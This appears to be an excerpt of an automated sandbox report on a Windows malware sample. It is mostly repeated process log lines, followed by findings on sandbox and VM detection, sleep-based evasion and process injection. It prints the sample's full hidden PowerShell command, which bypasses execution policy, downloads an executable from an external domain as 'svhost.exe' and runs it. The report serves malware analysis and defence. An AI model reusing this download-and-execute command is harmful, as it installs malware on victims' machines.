                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: svhost.exe, 00000002.00000002.424099399.0000000003173000.00000004.00000800.00020000.00000000.sdmp, Opgcxhsdw.exe, 00000009.00000002.587061238.000000000352F000.00000004.00000800.00020000.00000000.sdmp, Opgcxhsdw.exe, 0000000A.00000002.587414248.00000000025CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2160Thread sleep time: -3689348814741908s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\svhost.exe TID: 5496Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2164Thread sleep time: -7378697629483816s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5780Thread sleep time: -11990383647911201s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 376Thread sleep count: 4305 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2708Thread sleep time: -2767011611056431s >= -30000s
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\svhost.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9717
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9306
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9158
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4305
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\svhost.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: svhost.exe, 00000002.00000002.457069212.00000000056E0000.00000004.08000000.00040000.00000000.sdmp, svhost.exe, 00000002.00000002.428265959.0000000004197000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000002.00000002.428265959.0000000004760000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CCXLFA7AP1jfH6OOqEMU
                    Source: Opgcxhsdw.exe, 0000000A.00000002.587414248.00000000025CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                    Source: powershell.exe, 00000000.00000002.383284065.000001D9F46B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWe"%SystemRoot%\system32\mswsock.dllHashed"
                    Source: Opgcxhsdw.exe, 0000000A.00000002.587414248.00000000025CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual?hal9th@johndoe
                    Source: svhost.exe, 00000007.00000002.582385460.00000000015BD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\svhost.exeMemory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Bypasses PowerShell execution policy
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://oiartzunirratia.eus/install/clean/Lcovlccdxd.exe','C:\Users\user\AppData\Roaming\svhost.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhost.exe'
                    Encrypted powershell cmdline option found
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess created: Base64 decoded start-sleep -seconds 20
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess created: Base64 decoded start-sleep -seconds 20
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess created: Base64 decoded start-sleep -seconds 20
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess created: Base64 decoded start-sleep -seconds 20
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess created: Base64 decoded start-sleep -seconds 20
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess created: Base64 decoded start-sleep -seconds 20
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\AppData\Roaming\svhost.exeMemory written: C:\Users\user\AppData\Roaming\svhost.exe base: 400000 value starts with: 4D5A
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('https://oiartzunirratia.eus/install/clean/lcovlccdxd.exe','c:\users\user\appdata\roaming\svhost.exe');start-process 'c:\users\user\appdata\roaming\svhost.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\svhost.exe "C:\Users\user\AppData\Roaming\svhost.exe"
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess created: C:\Users\user\AppData\Roaming\svhost.exe C:\Users\user\AppData\Roaming\svhost.exe
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
